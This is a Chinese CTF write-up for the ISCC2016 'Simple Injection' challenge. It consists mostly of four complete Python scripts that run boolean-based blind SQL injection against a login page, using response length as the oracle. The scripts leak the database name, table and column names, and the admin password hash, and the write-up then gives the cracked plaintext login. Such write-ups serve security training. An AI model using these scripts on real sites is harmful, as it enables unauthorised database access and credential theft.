SQL 布尔盲注脚本（ISCC2016 Simple Injection）：以登录页响应体长度作为真/假判定（oracle），逐字符爆破数据库名、表名、列名和字段值

爆数据库

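import string
import requests

# Boolean-based blind SQL injection, stage 1: leak the current database name.
# Oracle: the login page returns a shorter body when the injected condition is
# true, so each character is confirmed by comparing len(response.text) against
# a threshold measured on the target beforehand.
# Only run this against a target you are authorised to test (here: a CTF box).

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation  # digits + letters + punctuation (no space, no non-ASCII)
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"    # {0}: 1-based offset, {1}: ASCII code probed

# Body length below this marks a TRUE response. It is target-specific:
# recalibrate by printing len(response.text) for a known-true and a
# known-false probe (an error page with a different size would otherwise be
# misclassified).
TRUE_LEN = 1192
TIMEOUT = 10      # seconds; without it a stalled connection hangs the whole scan
MAX_LEN = 50      # upper bound on the leaked string length (positions 1..49)

session = requests.Session()  # reuse one connection across the ~50*94 probes
st = 0
for i in range(1, MAX_LEN):  # i = 1-based character position
    st = 0
    for c in s:
        asc = ord(c)   # compare as ASCII code so quotes/punctuation need no escaping in the payload
        payload['username'] = username_template.format(i, asc)
        response = session.post(url, data=payload, timeout=TIMEOUT)
        if len(response.text) < TRUE_LEN:
            result += c
            print('database: ', result)
            st = 1
            break  # only one code can match this position; stop probing the rest of the charset
    if st == 0:
        # Nothing matched: either the string ended (substr() past the end
        # yields NULL, so the condition is never true) or the character at
        # this position is outside `s` -- the result is then truncated here.
        break
print('database: ', result)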

database=injection

爆表名

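import string
import requests

# Boolean-based blind SQL injection, stage 2: leak the table names of the
# current database as one comma-separated string (group_concat).
# Oracle: a shorter response body means the injected condition was true.
# Only run this against a target you are authorised to test (here: a CTF box).

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation  # digits + letters + punctuation (no space, no non-ASCII)
payload = {
    'username' : '',
    'password' : 1
}
result = ''

# {0}: 1-based offset into the group_concat string, {1}: ASCII code probed.
username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"

# Body length below this marks a TRUE response; target-specific, recalibrate
# by printing len(response.text) for a known-true and a known-false probe.
TRUE_LEN = 1192
TIMEOUT = 10      # seconds; a stalled connection would otherwise hang the scan
MAX_LEN = 50      # upper bound on the leaked string length (positions 1..49)

session = requests.Session()  # reuse one connection across the ~50*94 probes
st = 0
for i in range(1, MAX_LEN):  # i = 1-based character position
    st = 0
    for c in s:
        asc = ord(c)   # compare as ASCII code so quotes/punctuation need no escaping in the payload
        payload['username'] = username_template.format(i, asc)
        response = session.post(url, data=payload, timeout=TIMEOUT)
        if len(response.text) < TRUE_LEN:
            result += c
            print('tables: ', result)
            st = 1
            break  # only one code can match this position; stop probing the rest of the charset
    if st == 0:
        # Nothing matched: end of string, or a character outside `s`
        # (the result is then truncated here).
        break
print('tables: ', result)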

tables: admin

爆列名

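import string
import requests

# Boolean-based blind SQL injection, stage 3: leak the column names of the
# `admin` table as one comma-separated string (group_concat).
# Oracle: a shorter response body means the injected condition was true.
# Only run this against a target you are authorised to test (here: a CTF box).

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation  # digits + letters + punctuation (no space, no non-ASCII)
payload = {
    'username' : '',
    'password' : 1
}
result = ''

# {0}: 1-based offset into the group_concat string, {1}: ASCII code probed.
# NOTE(review): the lookup is not restricted to table_schema=database(); on a
# server with a same-named `admin` table in another schema its columns would be
# concatenated too -- add `/**/and/**/table_schema=database()` if that happens.
username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"

# Body length below this marks a TRUE response; target-specific, recalibrate
# by printing len(response.text) for a known-true and a known-false probe.
TRUE_LEN = 1192
TIMEOUT = 10      # seconds; a stalled connection would otherwise hang the scan
MAX_LEN = 50      # upper bound on the leaked string length (positions 1..49)

session = requests.Session()  # reuse one connection across the ~50*94 probes
st = 0
for i in range(1, MAX_LEN):  # i = 1-based character position
    st = 0
    for c in s:
        asc = ord(c)   # compare as ASCII code so quotes/punctuation need no escaping in the payload
        payload['username'] = username_template.format(i, asc)
        response = session.post(url, data=payload, timeout=TIMEOUT)
        if len(response.text) < TRUE_LEN:
            result += c
            print('columns: ', result)
            st = 1
            break  # only one code can match this position; stop probing the rest of the charset
    if st == 0:
        # Nothing matched: end of string, or a character outside `s`
        # (the result is then truncated here).
        break
print('columns: ', result)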

columns: id,username,password

爆值

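import string
import requests

# Boolean-based blind SQL injection, stage 4: leak the `password` value of
# the `admin` table (the stored value is a hash, see the recovered result).
# Oracle: a shorter response body means the injected condition was true.
# Only run this against a target you are authorised to test (here: a CTF box).

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation  # digits + letters + punctuation (no space, no non-ASCII)
payload = {
    'username' : '',
    'password' : 1
}
result = ''

# {0}: 1-based offset, {1}: ASCII code probed.
# NOTE(review): `(select password from admin)` is used as a scalar subquery;
# if `admin` ever holds more than one row MySQL raises "Subquery returns more
# than 1 row" and every probe reads as false -- use group_concat(password)
# or `limit 1` in that case.
username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"

# Body length below this marks a TRUE response; target-specific, recalibrate
# by printing len(response.text) for a known-true and a known-false probe.
TRUE_LEN = 1192
TIMEOUT = 10      # seconds; a stalled connection would otherwise hang the scan
MAX_LEN = 50      # upper bound on the leaked string length (positions 1..49); a 32-char MD5 fits

session = requests.Session()  # reuse one connection across the ~50*94 probes
st = 0
for i in range(1, MAX_LEN):  # i = 1-based character position
    st = 0
    for c in s:
        asc = ord(c)   # compare as ASCII code so quotes/punctuation need no escaping in the payload
        payload['username'] = username_template.format(i, asc)
        response = session.post(url, data=payload, timeout=TIMEOUT)
        if len(response.text) < TRUE_LEN:
            result += c
            print('password: ', result)
            st = 1
            break  # only one code can match this position; stop probing the rest of the charset
    if st == 0:
        # Nothing matched: end of string, or a character outside `s`
        # (the result is then truncated here).
        break
print('password: ', result)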

password: 334cfb59c9d74849801d5acdcfdaadc3

得到的 password 字段是一个 32 位 MD5 哈希。MD5 是单向哈希，不能“解密”，这里是通过在线字典/彩虹表查询得到对应明文，再用该明文登录提交：

username=admin&password=eTAloCrEP

原文地址:https://www.cnblogs.com/NPFS/p/12837454.html